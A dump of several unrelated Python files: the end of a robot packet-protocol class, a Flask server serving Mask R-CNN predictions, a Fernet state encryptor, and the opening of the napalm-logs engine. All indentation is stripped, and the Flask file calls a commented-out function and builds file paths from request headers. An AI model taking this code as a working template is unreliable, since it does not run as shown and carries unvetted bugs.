Returns None if phrase cannot be converted.
"""
# TODO: loop over a longer string with multiple packets and responses
try:
utf_phrase = phrase.encode('utf-8')
while len(utf_phrase) > Packet.PAYLOAD_LEN:
phrase = phrase[:-1]
utf_phrase = phrase.encode('utf-8')
except AttributeError:
return None
self._tx_q.put((Packet(5, 4, 0, payload=utf_phrase), True))
def get_light_sensor_data(self):
"""Request raw light sensor data."""
self._tx_q.put((Packet(13, 1, 0), True))
def get_battery_level(self):
"""Request the current battery level."""
self._tx_q.put((Packet(14, 1, 0), True))
@staticmethod
def _bound(value, low, high):
"""Helper function to keep numbers in bounds.
Parameter
---------
value : number
Value to keep in bounds.
low : number
Minimum of bounds check.
high : number
Maximum of bounds check.
Returns
-------
new_value
The original value, guaranteed between low and high, inclusive
"""
return min(high, max(low, value))
@staticmethod
def _calculate_timeout(packet):
"""Helper function to calculate a timeout for packets expecting a response.
Parameter
---------
packet : Packet
Packet for which to calculate a timeout
Returns
-------
timeout : float
Number of seconds to wait for message receipt.
"""
timeout = 4 # minimum to wait
cmd_type = (packet.dev, packet.cmd)
if cmd_type == (1, 8): # drive distance
distance = unpack('>i', packet.payload[0:4])
timeout += 1 + abs(*distance) / 10 # mm/s, drive speed
elif cmd_type == (1, 12): # rotate angle
angle = unpack('>i', packet.payload[0:4])
timeout += 1 + abs(*angle) / 1000 # decideg/s
elif cmd_type == (2, 0): # set marker/eraser position
timeout += 1
elif cmd_type == (5, 0): # play note finished
duration = unpack('>H', packet.payload[4:6])
timeout += duration / 1000 # ms/s
elif cmd_type == (5, 1): # say phrase finished
timeout += 16 # need to figure out how to calculate this
return timeout
def _responses_pending(self):
"""Helper function to determine whether any response packets are pending.
Returns
-------
value : bool
True if any response packets are pending.
"""
self.pending_lock.acquire()
pending_resp_len = len(self.pending_resp)
self.pending_lock.release()
return pending_resp_len > 0
def transmissions_pending(self):
"""Helper function to determine whether any transmissions are
waiting to be sent.
Returns
-------
value : bool
True if any transmissions are pending.
"""
return not self._tx_q.empty()
def _sending_thread(self):
"""Manages the sending of packets to the robot.
Sends messages in order from the tx queue, waiting if any
messages have responses pending.
If sniff mode is on, will print packet to standard out as it's sent.
"""
inc = 0
while self._phy.is_connected():
# block sending new commands until no responses pending
if self._responses_pending():
continue
if not self._tx_q.empty():
packet, expectResponse = self._tx_q.get()
packet.inc = inc
if expectResponse:
self.pending_lock.acquire()
# need a timeout because responses are not guaranteed.
resp_expire = time.time() + self._calculate_timeout(packet)
self.pending_resp.append(
(packet, resp_expire))
self.pending_lock.release()
self._phy.send_raw(packet.bytes)
if self.sniff_mode:
print('>>>', list(packet.bytes))
inc += 1
if inc > 255:
inc = 0
def _expiration_thread(self):
"""Manages the expiration of packets in the receiving queue."""
def tfilter(x, t):
if t < x[1]:
return True
print("Warning: message with header {} expired!".format([x[0].dev, x[0].cmd, x[0].inc]))
return False
while self._phy.is_connected():
time.sleep(0.5)
self.pending_lock.acquire()
now = time.time()
self.pending_resp = [x for x in self.pending_resp if tfilter(x, now)]
self.pending_lock.release()
supported_devices = { 0: 'General',
1: 'Motors',
2: 'MarkEraser',
4: 'Color',
12: 'Bumper',
13: 'Light',
14: 'Battery',
17: 'Touch',
20: 'Cliff'}
virtual_devices = { 4: 'ColorRaw',
13: 'LightRaw'}
event_messages = ( ( 0, 4),
( 1, 29),
( 4, 2),
(12, 0),
(13, 0),
(14, 0),
(17, 0),
(20, 0) )
resp_msg_acked = ( (1, 8),
(1, 12),
(1, 27),
(5, 0),
(5, 4) )
def _receiving_thread(self):
"""Manages the receipt of packets from the robot.
Interprets packets recieved in the rx queue in order and
acts upon them, if necessary.
If sniff mode is set, will print packets to standard out as
they are received.
"""
last_event = 255
while self._phy.is_connected():
if self._rx_q is not None and not self._rx_q.empty():
packet = Packet.from_bytes(self._rx_q.get())
state = packet.payload[4]
crc_fail = not packet.check_crc()
event_fail = None
if (packet.dev, packet.cmd) in self.event_messages:
event_fail = (packet.inc - last_event) & 0xFF != 1
last_event = packet.inc
if self.sniff_mode:
print('C' if crc_fail else ' ', 'E' if event_fail else ' ', list(packet.bytes) )
if crc_fail and not self.ignore_crc_errors:
continue
dev_name = self.supported_devices[packet.dev] if packet.dev in self.supported_devices else None
if (packet.dev, packet.cmd) in self.event_messages:
if dev_name == 'General' and packet.cmd == 4: # stop project
print('Warning: Stop Project!')
self.stop_project_flag.set()
# purge all pending transmissions
while not self._tx_q.empty():
packet, expectResponse = self._tx_q.get()
# stop waiting for any responses
self.pending_lock.acquire()
self.pending_resp.clear()
self.pending_lock.release()
elif dev_name == 'Motors' and packet.cmd == 29: # motor stall
m = ['left', 'right', 'markeraser']
c = ['none', 'overcurrent', 'undercurrent', 'underspeed', 'saturated', 'timeout']
print("Stall: {} motor {}.".format(m[state], c[packet.payload[5]]))
elif dev_name == 'Color' and packet.cmd == 2:
if self.state[dev_name] is None:
self.state[dev_name] = [0]*32
i = 0
for byte in packet.payload:
self.state[dev_name][i*2+0] = (byte & 0xF0) >> 4
self.state[dev_name][i*2+1] = byte & 0x0F
i += 1
elif dev_name == 'Bumper' and packet.cmd == 0:
if state == 0:
self.state[dev_name] = (False, False)
elif state == 0x40:
self.state[dev_name] = (False, True)
elif state == 0x80:
self.state[dev_name] = (True, False)
elif state == 0xC0:
self.state[dev_name] = (True, True)
else:
self.state[dev_name] = packet.payload
elif dev_name == 'Light' and packet.cmd == 0:
if state == 4:
self.state[dev_name] = (False, False)
elif state == 5:
self.state[dev_name] = (False, True)
elif state == 6:
self.state[dev_name] = (True, False)
elif state == 7:
self.state[dev_name] = (True, True)
else:
self.state[dev_name] = packet.payload
elif dev_name == 'Battery' and packet.cmd == 0:
self.state[dev_name] = packet.payload[6]
elif dev_name == 'Touch' and packet.cmd == 0:
if self.state[dev_name] is None:
self.state[dev_name] = {}
self.state[dev_name]['FL'] = state & 0x80 == 0x80
self.state[dev_name]['FR'] = state & 0x40 == 0x40
self.state[dev_name]['RR'] = state & 0x20 == 0x20
self.state[dev_name]['RL'] = state & 0x10 == 0x10
elif dev_name == 'Cliff' and packet.cmd == 0:
self.state[dev_name] = state == 1
else:
self.state[dev_name] = packet.bytes
print('Unhandled event message from ' + dev_name)
print(list(packet.bytes))
else: # response message
orig_packet = None
self.pending_lock.acquire()
# see if (dev, cmd, inc, _) exists in pending_resp
result = [
resp for resp in self.pending_resp
if (resp[0].dev == packet.dev
and resp[0].cmd == packet.cmd
and resp[0].inc == packet.inc)
]
#print(result)
if len(result) != 1:
print('Warning: unexpected response for message',
packet.dev, packet.cmd, packet.inc)
else:
#print ('got resp for', result[0][0].dev, result[0][0].cmd, result[0][0].inc)
orig_packet = result[0][0]
self.pending_resp.remove(result[0])
self.pending_lock.release()
if (packet.dev, packet.cmd) in self.resp_msg_acked:
pass # no side effects
elif dev_name == 'General':
if self.state[dev_name] is None:
self.state[dev_name] = {}
if packet.cmd == 0: # get versions
self.state[dev_name][packet.payload[0]] = packet.payload[1] + packet.payload[2] / 1000
elif packet.cmd == 2: # get name
self.state[dev_name]['Name'] = packet.payload.decode('utf-8').rstrip('\0')
elif packet.cmd == 11: # get enabled events
self.state[dev_name]['EnabledEvents'] = packet.payload
elif packet.cmd == 14: # get serial number
self.state[dev_name]['Serial'] = packet.payload.decode('utf-8').rstrip('\0')
elif dev_name == 'MarkEraser' and packet.cmd == 0: # set marker/eraser position
pos = packet.payload[0]
if pos == 0:
self.state[dev_name] = 'marker_up_eraser_up'
elif pos == 1:
self.state[dev_name] = 'marker_down_eraser_up'
elif pos == 2:
self.state[dev_name] = 'marker_up_eraser_down'
else:
self.state[dev_name] = pos # undefined
elif dev_name == 'Color' and packet.cmd == 1 and orig_packet is not None:
if self.state['ColorRaw'] is None:
self.state['ColorRaw'] = [ [None]*32 for _ in range(5) ]
offset = orig_packet.payload[0] * 8
for i in range(8):
self.state['ColorRaw'][orig_packet.payload[1]][offset + i] = \
packet.payload[i*2]*256 + packet.payload[i*2+1]
elif dev_name == 'Light' and packet.cmd == 1 and orig_packet is not None:
if self.state['LightRaw'] is None:
self.state['LightRaw'] = [None]*2
for i in range(2):
self.state['LightRaw'][i] = \
packet.payload[i*2+4]*256 + packet.payload[i*2+5]
elif dev_name == 'Battery' and packet.cmd == 1: # get battery level
self.state[dev_name] = packet.payload[6]
else:
print('Unsupported message ', list(packet.bytes))
def get_sniff_mode(self):
"""Helper function to determine whether we are in sniff mode."""
return self.sniff_mode
def set_sniff_mode(self, mode):
"""Helper function to set sniff mode on or off.
Parameters
----------
mode : bool
True to turn sniff mode on; False to turn it off.
"""
self.sniff_mode = bool(mode)
|
flask_server.py
|
from datetime import datetime
import threading
from flask import Flask, request, jsonify
import os
import sys
import numpy as np
import json
import cv2
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.structures.bounding_box import BoxList
from predictor import COCODemo
from train import TrainingThread
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import time
class FlaskServer(object):
def __init__(self, args):
self.model = None
self.PORT = args.PORT
self.HOST = args.HOST
self.architecture = args.ARCH #"R_50_C4_1x" # architecture for FasterRCNN
self.weight = args.WEIGHT
self.args = args
# self.training_thread = threading.Thread(
# target=self.training_in_background)
def setup(self):
# self.project = "Seeds_Striga_Strategy1" # project
self.model = None # FasterRCNN model
# print(list_project())
# print(list_architecture())
initialize_model()
app.run(host=self.HOST, port=self.PORT)
# def training_in_background(self, t=10):
# print("hello from training")
# time.sleep(t)
# print("hello again after 10sec")
app = Flask(__name__)
@app.route("/") # main webpage
def home():
return "Hello world!"
@app.route("/api/list_projects", methods=['POST'])
def list_project():
return os.listdir(args.DATA_FOLDER) # ["Seeds", "Pills", "Spine", "Fish"]
# @app.route("/api/list_architecture", methods=['POST'])
# def list_architecture():
# folder_architectures = os.path.join(
# args.DATA_FOLDER, server.project, "output")
# return os.listdir(folder_architectures)
@app.route("/api/select_project", methods=['POST'])
def select_project():
headers = request.headers
print(headers)
# server.project = headers
server.architecture = list_architecture()[0]
err = initialize_model()
result = jsonify({'Error': err,
})
print(result)
return result
@app.route("/api/select_architecture", methods=['POST'])
def select_architecture():
headers = request.headers
print(headers)
server.architecture = headers
err = initialize_model()
result = jsonify({'Error': err,
})
print(result)
return result
def initialize_model():
# Initialize the model
# args: None
# return: [boolean]: Error loading model
config_file = f"./configs/e2e_faster_rcnn_{server.architecture}.yaml"
print(f'trying to load model from {config_file}')
if not os.path.exists(config_file):
print("Dir does not exists")
return True
cfg.merge_from_file(config_file)
# os.path.join(args.DATA_FOLDER, args.WEIGHT)
cfg.DATASETS.DATA_DIR = os.path.join(args.DATA_FOLDER, args.PROJECT_FOLDER)
cfg.DATASETS.TRAIN = ['folder_train']
cfg.DATASETS.TEST = ['folder_test']
cfg.MODEL.ROI_BOX_HEAD.NUM_CLASSES=3
cfg.TEST.DETECTIONS_PER_IMG=200
cfg.MODEL.ROI_HEADS.DETECTIONS_PER_IMG=200
# cfg.RPN.NMS_THRESH = 0.7
cfg.MODEL.ROI_HEADS.NMS = 0.1 #0.5
# cfg.TEST.BBOX_AUG.ENABLED=True
# cfg.TEST.BBOX_AUG.H_FLIP=True
# cfg.OUTPUT_DIR = os.path.dirname(cfg.DATASETS.DATA_DIR)
cfg.OUTPUT_DIR = os.path.join(
# cfg.DATASETS.DATA_DIR, "output", server.architecture)
cfg.DATASETS.DATA_DIR, "output", args.WEIGHT)
# cfg.freeze()
# print(cfg.OUTPUT_DIR + "/model_bestval.pth")
server.model = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
weight_loading=cfg.OUTPUT_DIR + "/model_bestval.pth",
)
# Get list of CATEGORIES from dataloader
data_loader = make_data_loader(cfg, is_train=False)
server.model.CATEGORIES = data_loader[0].dataset.CLASSES
return False
# training_thread = threading.Thread(
# target=training_in_background)
# training_thread = threading.Thread()
@app.route("/api/train", methods=['POST'])
def train():
headers = request.headers
print(headers)
trainingCFG = {"project_ID": "Striga_Strategy1",
"training_images": ["image1", "image2"],
"validation_images": ["image1", "image2"],
"time": 12,
"asked_training_date": datetime.now().strftime("%H:%M:%S")}
ret = training_thread.append_training(trainingCFG)
if ret:
print("PROJECT alread in QUEUE")
else:
print("PROJECT QUEUED")
return jsonify({'asked_training': True,
'added_to_queue': ret,
})
@app.route("/api/predict", methods=['POST'])
def predict():
initialize_model()
headers = request.headers
print(headers)
print("got something")
if (headers["content-type"] == "image/jpeg") and server.model is not None:
# Read request
image_bytes = request.data
nparr = np.frombuffer(image_bytes,np.uint8)
image_bytes = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
# compute prediction
predictions = server.model.compute_prediction(image_bytes)
# predictions = server.model.select_top_predictions(predictions)
print(predictions)
boxes = predictions.bbox.numpy().tolist()
# print("boxes", boxes)
# print(predictions.get_field("labels").numpy().tolist())
# print(server.model.CATEGORIES)
labels_words = [server.model.CATEGORIES[label]
for label in predictions.get_field("labels").numpy().tolist()]
scores = predictions.get_field("scores").numpy().tolist()
return jsonify({'boxes': boxes,
'labels_words': labels_words,
'scores': scores
})
if __name__ == "__main__":
parser = ArgumentParser(
description='Train or test Shape Completion for 3D Tracking',
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--HOST", type=str, default="localhost",
help="host IP")
parser.add_argument("--PORT", type=int, default=5000,
help="commmunication port")
parser.add_argument("--DATA_FOLDER", type=str,
default="/media/giancos/Football/CloudLabeling_DS/CloudLabeling/",
help="main folder shere data and model is stored")
parser.add_argument("--PROJECT_FOLDER", type=str,
default="Seeds_Striga_Strategy1",
help="project folder where single project are held")
parser.add_argument("--ARCH", type=str,
default="R_50_C4_1x",
help="type of architecture to load the proper configuration file")
parser.add_argument("--WEIGHT", type=str,
default="R_50_C4_1x_pre_19",
help="folder where the model has been outputed, after training")
# parser.add_argument("--DATA_FOLDER", type=str,
# default="Seeds_Striga_Strategy1",
# help="main folder shere data and model is stored")
parser.add_argument(
'--GPU',
required=False,
type=int,
default=-1,
help='ID of the GPU to use')
args = parser.parse_args()
if args.GPU >= 0:
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.GPU)
training_thread = TrainingThread()
training_thread.start()
server = FlaskServer(args)
server.setup()
|
state.py
|
import logging
import pickle
import threading
import time
from typing import List
import schedule as schedule
from cryptography.fernet import Fernet, MultiFernet, InvalidToken
SCHEDULER_SLEEP_TIME = 1
REASONABLE_NUMBER_OF_KEYS = 500
class StateEncryptor(object):
def __init__(self, state_aging_tolerance: int = 120, key_renewal_frequency: int = 30):
if state_aging_tolerance <= 0:
raise ValueError("Bad state_aging_tolerance")
if key_renewal_frequency < 0:
raise ValueError("Bad key_renewal_frequency")
self.__state_aging_tolerance: int = state_aging_tolerance
self.__key_renewal_frequency: int = key_renewal_frequency
self.__max_keys = 1
if key_renewal_frequency > 0:
if state_aging_tolerance < key_renewal_frequency:
self.__max_keys += 1
else:
self.__max_keys += state_aging_tolerance // key_renewal_frequency
if self.__max_keys >= REASONABLE_NUMBER_OF_KEYS:
raise ValueError(f"Keeping {self.__max_keys} keys is ridiculous.")
self.__keys: List[Fernet] = []
self.__renew_key()
self.__encryptor: MultiFernet = MultiFernet(self.__keys)
self.__thread_stop_event = threading.Event()
def __renew_key(self):
self.__keys.insert(0, Fernet(Fernet.generate_key()))
self.__keys = self.__keys[:self.__max_keys]
logging.debug(self.__keys)
self.__encryptor = MultiFernet(self.__keys)
def start(self):
schedule.every(self.__key_renewal_frequency).seconds.do(self.__renew_key)
thread = threading.Thread(target=self.__run_scheduler)
thread.start()
def stop(self):
self.__thread_stop_event.set()
def __run_scheduler(self):
while not self.__thread_stop_event.is_set():
schedule.run_pending()
time.sleep(SCHEDULER_SLEEP_TIME)
@property
def max_keys(self):
return self.__max_keys
def encrypt_state(self, state: object) -> bytes:
state_serialization = pickle.dumps(state)
fernet_token = self.__encryptor.encrypt(state_serialization)
return fernet_token
def decrypt_state(self, encrypted_state: bytes) -> object:
try:
decrypted_state = self.__encryptor.decrypt(encrypted_state, self.__state_aging_tolerance)
state = pickle.loads(decrypted_state)
except InvalidToken as e:
raise ValueError("Cannot decrypt state")
return state
|
base.py
|
# -*- coding: utf-8 -*-
'''
napalm-logs base
'''
from __future__ import absolute_import
# Import std lib
import os
import re
import imp
import sys
import time
import yaml
import logging
import threading
from multiprocessing import Process
# Import third party libs
try:
import sentry_sdk
HAS_SENTRY = True
except ImportError:
HAS_SENTRY = False
# crypto
import nacl.utils
import nacl.secret
import nacl.signing
import nacl.encoding
from prometheus_client import start_http_server, CollectorRegistry, multiprocess
# Import napalm-logs pkgs
import napalm_logs.utils
import napalm_logs.config as CONFIG
import napalm_logs.buffer
# processes
from napalm_logs.auth import NapalmLogsAuthProc
from napalm_logs.device import NapalmLogsDeviceProc
from napalm_logs.server import NapalmLogsServerProc
from napalm_logs.publisher import NapalmLogsPublisherProc
from napalm_logs.listener_proc import NapalmLogsListenerProc
from napalm_logs.pub_proxy import NapalmLogsPublisherProxy
# exceptions
from napalm_logs.exceptions import ConfigurationException
log = logging.getLogger(__name__)
class NapalmLogs:
def __init__(
self,
address='0.0.0.0',
port=514,
listener='udp',
publisher='zmq',
publish_address='0.0.0.0',
publish_port=49017,
auth_address='0.0.0.0',
auth_port=49018,
metrics_enabled=False,
metrics_address='0.0.0.0',
metrics_port='9215',
metrics_dir='/tmp/napalm_logs_metrics',
certificate=None,
keyfile=None,
disable_security=False,
config_path=None,
config_dict=None,
extension_config_path=None,
extension_config_dict=None,
log_level='warning',
log_format='%(asctime)s,%(msecs)03.0f [%(name)-17s][%(levelname)-8s] %(message)s',
device_blacklist=[],
device_whitelist=[],
hwm=None,
device_worker_processes=1,
serializer='msgpack',
buffer=None,
opts=None,
):
'''
Init the napalm-logs engine.
:param address: The address to bind the syslog client. Default: 0.0.0.0.
:param port: Listen port. Default: 514.
:param listener: Listen type. Default: udp.
:param publish_address: The address to bing when publishing the OC
objects. Default: 0.0.0.0.
:param publish_port: Publish port. Default: 49017.
'''
self.opts = opts if opts else {}
sentry_dsn = self.opts.get('sentry_dsn') or os.getenv('SENTRY_DSN')
if sentry_dsn:
if HAS_SENTRY:
sentry_sdk.init(
sentry_dsn,
**self.opts.get('sentry_opts', {'traces_sample_rate': 1.0})
)
else:
log.warning(
'Sentry DSN provided, but the sentry_sdk library is not installed'
)
self.address = address
self.port = port
self.listener = listener
self.publisher = publisher
self.publish_address = publish_address
self.publish_port = publish_port
self.auth_address = auth_address
self.auth_port = auth_port
self.metrics_enabled = metrics_enabled
self.metrics_address = metrics_address
self.metrics_port = metrics_port
self.metrics_dir = metrics_dir
self.certificate = certificate
self.keyfile = keyfile
self.disable_security = disable_security
self.config_path = config_path
self.config_dict = config_dict
self.extension_config_path = extension_config_path
self.extension_config_dict = extension_config_dict
self.log_level = log_level
self.log_format = log_format
self.device_whitelist = device_whitelist
self.device_blacklist = device_blacklist
self.serializer = serializer
self.device_worker_processes = device_worker_processes
self.hwm = hwm
self._buffer_cfg = buffer
self._buffer = None
# Setup the environment
self._setup_log()
self._build_config()
self._verify_config()
self._post_preparation()
# Start the Prometheus metrics server
self._setup_metrics()
self._setup_buffer()
# Private vars
self.__priv_key = None
self.__signing_key = None
self._processes = []
self.up = True
def _exit_gracefully(self, signum, _):
self.stop_engine()
def __exit__(self, exc_type, exc_value, exc_traceback):
self.stop_engine()
if exc_type is not None:
log.error('Exiting due to unhandled exception', exc_info=True)
self.__raise_clean_exception(exc_type, exc_value, exc_traceback)
def _setup_buffer(self):
'''
Setup the buffer subsystem.
'''
if not self._buffer_cfg or not isinstance(self._buffer_cfg, dict):
return
buffer_name = list(self._buffer_cfg.keys())[0]
buffer_class = napalm_logs.buffer.get_interface(buffer_name)
log.debug('Setting up buffer interface "%s"', buffer_name)
if 'expire_time' not in self._buffer_cfg[buffer_name]:
self._buffer_cfg[buffer_name]['expire_time'] = CONFIG.BUFFER_EXPIRE_TIME
self._buffer = buffer_class(**self._buffer_cfg[buffer_name])
def _setup_metrics(self):
"""
Start metric exposition
"""
path = os.environ.get("prometheus_multiproc_dir")
if not os.path.exists(self.metrics_dir):
try:
log.info("Creating metrics directory")
os.makedirs(self.metrics_dir)
except OSError:
log.error("Failed to create metrics directory!")
raise ConfigurationException("Failed to create metrics directory!")
path = self.metrics_dir
elif path != self.metrics_dir:
path = self.metrics_dir
os.environ['prometheus_multiproc_dir'] = path
log.info("Cleaning metrics collection directory")
log.debug("Metrics directory set to: {}".format(path))
files = os.listdir(path)
for f in files:
if f.endswith(".db"):
os.remove(os.path.join(path, f))
log.debug("Starting metrics exposition")
if self.metrics_enabled:
registry = CollectorRegistry()
multiprocess.MultiProcessCollector(registry)
start_http_server(
port=self.metrics_port, addr=self.metrics_address, registry=registry
)
def _setup_log(self):
'''
Setup the log object.
'''
logging_level = CONFIG.LOGGING_LEVEL.get(self.log_level.lower())
logging.basicConfig(format=self.log_format, level=logging_level)
def _post_preparation(self):
'''
The steps for post-preparation (when the logs, and everything is
already setup).
'''
self.opts['hwm'] = CONFIG.ZMQ_INTERNAL_HWM if self.hwm is None else self.hwm
self.opts['_server_send_unknown'] = False
for pub in self.publisher:
pub_name = list(pub.keys())[0]
pub_opts = list(pub.values())[0]
error_whitelist = pub_opts.get('error_whitelist', [])
error_blacklist = pub_opts.get('error_blacklist', [])
if 'UNKNOWN' not in error_blacklist:
# by default we should not send unknown messages
error_blacklist.append('UNKNOWN')
if 'RAW' not in error_blacklist:
# same with RAW
error_blacklist.append('RAW')
# This implementation is a bit sub-optimal, but more readable like
# that. It is executed only at the init, so just once.
if 'only_unknown' in pub_opts and pub[pub_name]['only_unknown']:
pub[pub_name]['send_unknown'] = True
error_whitelist = ['UNKNOWN']
error_blacklist = []
if 'only_raw' in pub_opts and pub[pub_name]['only_raw']:
pub[pub_name]['send_raw'] = True
error_whitelist = ['RAW']
error_blacklist = []
if 'send_unknown' in pub_opts and 'UNKNOWN' in error_blacklist:
error_blacklist.remove('UNKNOWN')
if 'send_raw' in pub_opts and 'RAW' in error_blacklist:
error_blacklist.remove('RAW')
self.opts['_server_send_unknown'] |= (
'UNKNOWN' in error_whitelist or 'UNKNOWN' not in error_blacklist
)
pub[pub_name]['error_whitelist'] = error_whitelist
pub[pub_name]['error_blacklist'] = error_blacklist
def _whitelist_blacklist(self, os_name):
'''
Determines if the OS should be ignored,
depending on the whitelist-blacklist logic
configured by the user.
'''
return napalm_logs.ext.check_whitelist_blacklist(
os_name, whitelist=self.device_whitelist, blacklist=self.device_blacklist
)
@staticmethod
def _extract_yaml_docstring(stream):
'''
Extract the comments at the top of the YAML file,
from the stream handler.
Return the extracted comment as string.
'''
comment_lines = []
lines = stream.read().splitlines()
for line in lines:
line_strip = line.strip()
if not line_strip:
continue
if line_strip.startswith('#'):
comment_lines.append(line_strip.replace('#', '', 1).strip())
else:
break
return ' '.join(comment_lines)
def _load_config(self, path):
'''
Read the configuration under a specific path
and return the object.
'''
config = {}
log.debug('Reading configuration from %s', path)
if not os.path.isdir(path):
msg = (
'Unable to read from {path}: ' 'the directory does not exist!'
).format(path=path)
log.error(msg)
raise IOError(msg)
# The directory tree should look like the following:
# .
# ├── __init__.py
# ├── eos
# │ └── init.yml
# ├── iosxr
# │ └── __init__.py
# ├── junos
# │ └── init.yml
# │ └── bgp_read_message.py
# │ └── BGP_PREFIX_THRESH_EXCEEDED.py
# └── nxos
# └── init.yml
os_subdirs = [sdpath[0] for sdpath in os.walk(path)][1:]
if not os_subdirs:
log.error('%s does not contain any OS subdirectories', path)
for os_dir in os_subdirs:
os_name = os.path.split(os_dir)[1] # the network OS name
if os_name.startswith('__'):
log.debug('Ignoring %s', os_name)
continue
if not self._whitelist_blacklist(os_name):
log.debug(
'Not building config for %s (whitelist-blacklist logic)', os_name
)
# Ignore devices that are not in the whitelist (if defined),
# or those operating systems that are on the blacklist.
# This way we can prevent starting unwanted sub-processes.
continue
log.debug('Building config for %s:', os_name)
log.debug('=' * 40)
if os_name not in config:
config[os_name] = {}
files = os.listdir(os_dir)
# Read all files under the OS dir
for file_ in files:
log.debug('Inspecting %s', file_)
file_name, file_extension = os.path.splitext(file_)
file_extension = file_extension.replace('.', '')
filepath = os.path.join(os_dir, file_)
comment = ''
if file_extension in ('yml', 'yaml'):
try:
log.debug('Loading %s as YAML', file_)
with open(filepath, 'r') as fstream:
cfg = yaml.load(fstream, Loader=yaml.FullLoader)
# Reposition at the top and read the comments.
if file_name not in CONFIG.OS_INIT_FILENAMES:
# If the file name is not a profile init.
fstream.seek(0)
comment = self._extract_yaml_docstring(fstream)
if 'messages' in cfg:
for message in cfg['messages']:
message['__doc__'] = comment
napalm_logs.utils.dictupdate(config[os_name], cfg)
except yaml.YAMLError as yamlexc:
log.error('Invalid YAML file: %s', filepath, exc_info=True)
if file_name in CONFIG.OS_INIT_FILENAMES:
# Raise exception and break only when the init file is borked
# otherwise, it will try loading best efforts.
raise IOError(yamlexc)
elif file_extension == 'py':
log.debug('Lazy loading Python module %s', file_)
mod_fp, mod_file, mod_data = imp.find_module(file_name, [os_dir])
mod = imp.load_module(file_name, mod_fp, mod_file, mod_data)
if file_name in CONFIG.OS_INIT_FILENAMES:
# Init file defined as Python module
log.debug('%s seems to be a Python profiler', filepath)
# Init files require to define the `extract` function.
# Sample init file:
# def extract(message):
# return {'tag': 'A_TAG', 'host': 'hostname'}
if hasattr(mod, CONFIG.INIT_RUN_FUN) and hasattr(
getattr(mod, CONFIG.INIT_RUN_FUN), '__call__'
):
# if extract is defined and is callable
if 'prefixes' not in config[os_name]:
config[os_name]['prefixes'] = []
config[os_name]['prefixes'].append(
{
'values': {'tag': ''},
'line': '',
'__python_fun__': getattr(mod, CONFIG.INIT_RUN_FUN),
'__python_mod__': filepath, # Will be used for debugging
}
)
log.info(
'Adding the prefix function defined under %s to %s',
filepath,
os_name,
)
elif file_name != '__init__':
# If __init__.py does not have the extractor function, no problem.
log.warning(
'%s does not have the "%s" function defined. Ignoring.',
filepath,
CONFIG.INIT_RUN_FUN,
)
else:
# Other python files require the `emit` function.
if hasattr(mod, '__tag__'):
mod_tag = getattr(mod, '__tag__')
else:
log.info(
'%s does not have __tag__, defaulting the tag to %s',
filepath,
file_name,
)
mod_tag = file_name
if hasattr(mod, '__error__'):
mod_err = getattr(mod, '__error__')
else:
log.info(
'%s does not have __error__, defaulting the error to %s',
filepath,
file_name,
)
mod_err = file_name
if hasattr(mod, '__match_on__'):
err_match = getattr(mod, '__match_on__')
else:
err_match = 'tag'
model = CONFIG.OPEN_CONFIG_NO_MODEL
if hasattr(mod, '__yang_model__'):
model = getattr(mod, '__yang_model__')
log.debug('Mathing on %s', err_match)
if hasattr(mod, CONFIG.CONFIG_RUN_FUN) and hasattr(
getattr(mod, CONFIG.CONFIG_RUN_FUN), '__call__'
):
log.debug(
'Adding %s with tag:%s, error:%s, matching on:%s',
file_,
mod_tag,
mod_err,
err_match,
)
# the structure below must correspond to the VALID_CONFIG structure enforcement
if 'messages' not in config[os_name]:
config[os_name]['messages'] = []
config[os_name]['messages'].append(
{
'tag': mod_tag,
'error': mod_err,
'match_on': err_match,
'__doc__': mod.__doc__,
'__python_fun__': getattr(
mod, CONFIG.CONFIG_RUN_FUN
),
'__python_mod__': filepath, # Will be used for debugging
'line': '',
'model': model,
'values': {},
'mapping': {'variables': {}, 'static': {}},
}
)
else:
log.warning(
'%s does not have the "%s" function defined. Ignoring.',
filepath,
CONFIG.CONFIG_RUN_FUN,
)
else:
log.info('Ignoring %s (extension not allowed)', filepath)
log.debug('-' * 40)
if not config:
msg = 'Could not find proper configuration files under {path}'.format(
path=path
)
log.error(msg)
raise IOError(msg)
log.debug('Complete config:')
log.debug(config)
log.debug('ConfigParserg size in bytes: %d', sys.getsizeof(config))
return config
@staticmethod
def _raise_config_exception(error_string):
log.error(error_string, exc_info=True)
raise ConfigurationException(error_string)
def _compare_values(self, value, config, dev_os, key_path):
if (
'line' not in value
or 'values' not in value
or '__python_fun__' not in value
): # Check looks good when using a Python-defined profile.
return
from_line = re.findall(r'\{(\w+)\}', config['line'])
if set(from_line) == set(config['values']):
return
if config.get('error'):
error = 'The "values" do not match variables in "line" for {}:{} in {}'.format(
':'.join(key_path), config.get('error'), dev_os
)
else:
error = 'The "values" do not match variables in "line" for {} in {}'.format(
':'.join(key_path), dev_os
)
self._raise_config_exception(error)
def _verify_config_key(self, key, value, valid, config, dev_os, key_path):
key_path.append(key)
if config.get(key, False) is False:
self._raise_config_exception(
'Unable to find key "{}" for {}'.format(':'.join(key_path), dev_os)
)
if isinstance(value, type):
if not isinstance(config[key], value):
self._raise_config_exception(
'Key "{}" for {} should be {}'.format(
':'.join(key_path), dev_os, value
)
)
elif isinstance(value, dict):
if not isinstance(config[key], dict):
self._raise_config_exception(
'Key "{}" for {} should be of type <dict>'.format(
':'.join(key_path), dev_os
)
)
self._verify_config_dict(value, config[key], dev_os, key_path)
# As we have already checked that the config below this point is correct, we know that "line" and "values"
# exists in the config if they are present in the valid config
self._compare_values(value, config[key], dev_os, key_path)
elif isinstance(value, list):
if not isinstance(config[key], list):
self._raise_config_exception(
'Key "{}" for {} should be of type <list>'.format(
':'.join(key_path), dev_os
)
)
for item in config[key]:
self._verify_config_dict(value[0], item, dev_os, key_path)
self._compare_values(value[0], item, dev_os, key_path)
key_path.remove(key)
def _verify_config_dict(self, valid, config, dev_os, key_path=None):
'''
Verify if the config dict is valid.
'''
if not key_path:
key_path = []
for key, value in valid.items():
self._verify_config_key(key, value, valid, config, dev_os, key_path)
def _verify_config(self):
'''
Verify that the config is correct
'''
if not self.config_dict:
self._raise_config_exception('No config found')
